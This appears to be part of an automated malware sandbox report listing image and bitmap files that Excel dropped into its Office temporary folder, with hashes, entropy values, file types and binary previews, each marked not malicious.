                  Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48F669AC.png
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):6815
                  Entropy (8bit):7.871668067811304
                  Encrypted:false
                  SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
                  MD5:E2267BEF7933F02C009EAEFC464EB83D
                  SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
                  SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
                  SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
                  Malicious:false
                  Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A5EF89A.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
                  Category:dropped
                  Size (bytes):7006
                  Entropy (8bit):7.000232770071406
                  Encrypted:false
                  SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
                  MD5:971312D4A6C9BE9B496160215FE59C19
                  SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
                  SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
                  SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
                  Malicious:false
                  Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F6D3C08.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                  Category:dropped
                  Size (bytes):85020
                  Entropy (8bit):7.2472785111025875
                  Encrypted:false
                  SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                  MD5:738BDB90A9D8929A5FB2D06775F3336F
                  SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                  SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                  SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                  Malicious:false
                  Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\85D16660.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                  Category:dropped
                  Size (bytes):85020
                  Entropy (8bit):7.2472785111025875
                  Encrypted:false
                  SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                  MD5:738BDB90A9D8929A5FB2D06775F3336F
                  SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                  SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                  SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                  Malicious:false
                  Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9D207B6E.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                  Category:dropped
                  Size (bytes):14198
                  Entropy (8bit):7.916688725116637
                  Encrypted:false
                  SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                  MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                  SHA1:72CA86D260330FC32246D28349C07933E427065D
                  SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                  SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                  Malicious:false
                  Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEC4B86A.emf
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                  Category:dropped
                  Size (bytes):648132
                  Entropy (8bit):2.8123732035585567
                  Encrypted:false
                  SSDEEP:3072:s34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:e4UcLe0JOcXuunhqcS
                  MD5:BA69715E6EB54DCEED5B1507537588A9
                  SHA1:87833A16EC09B976C107F225E66B68B52E6A40A6
                  SHA-256:9D7AA7153D914458F4FB697A092F57D6725C1FDBC5086991DF200642355211AE
                  SHA-512:A726ED7A59CE51C6BF9ADED36634FDE236C40B3F414165B7FADE0AEBF172F50D7A17F273F572EF5BADFC24DFFC91D9C33EAACA7380E632BC04CB6F555E068B92
                  Malicious:false
                  Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................Z$...p...f.Z.@..%...L............t..RQt[..........\.....$Qt[...... ...Id.Z...... .........'..d.Z............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i..............X...... ...8.Z......'.dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA746F1B.png
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):84203
                  Entropy (8bit):7.979766688932294
                  Encrypted:false
                  SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                  MD5:208FD40D2F72D9AED77A86A44782E9E2
                  SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                  SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                  SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                  Malicious:false
                  Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D48A6F02.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
                  Category:dropped
                  Size (bytes):7006
                  Entropy (8bit):7.000232770071406
                  Encrypted:false
                  SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
                  MD5:971312D4A6C9BE9B496160215FE59C19
                  SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
                  SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
                  SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
                  Malicious:false
                  Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB3F3C69.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                  Category:dropped
                  Size (bytes):8815
                  Entropy (8bit):7.944898651451431
                  Encrypted:false
                  SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                  MD5:F06432656347B7042C803FE58F4043E1
                  SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                  SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                  SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                  Malicious:false
                  Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4E9FBD3.png
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):84203
                  Entropy (8bit):7.979766688932294
                  Encrypted:false
                  SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                  MD5:208FD40D2F72D9AED77A86A44782E9E2
                  SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                  SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                  SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                  Malicious:false
                  Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9921897.png
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                  Category:dropped
                  Size (bytes):49744
                  Entropy (8bit):7.99056926749243
                  Encrypted:true
                  SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                  MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                  SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                  SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                  SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                  Malicious:false
                  Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso4138.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                  Category:dropped
                  Size (bytes):1254
                  Entropy (8bit):5.835900066445133
                  Encrypted:false
                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                  MD5:A3C62E516777C15BF216F12143693C61
                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                  Malicious:false
                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso4167.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                  Category:dropped
                  Size (bytes):1254
                  Entropy (8bit):5.835900066445133
                  Encrypted:false
                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                  MD5:A3C62E516777C15BF216F12143693C61
                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                  Malicious:false
                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso4168.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                  Category:dropped
                  Size (bytes):1254
                  Entropy (8bit):5.835900066445133
                  Encrypted:false
                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                  MD5:A3C62E516777C15BF216F12143693C61
                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                  Malicious:false
                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoF0B5.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                  Category:dropped
                  Size (bytes):1254
                  Entropy (8bit):5.835900066445133
                  Encrypted:false
                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                  MD5:A3C62E516777C15BF216F12143693C61
                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                  Malicious:false
                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoF0B6.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                  Category:dropped
                  Size (bytes):1254
                  Entropy (8bit):5.835900066445133
                  Encrypted:false
                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                  MD5:A3C62E516777C15BF216F12143693C61
                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                  Malicious:false
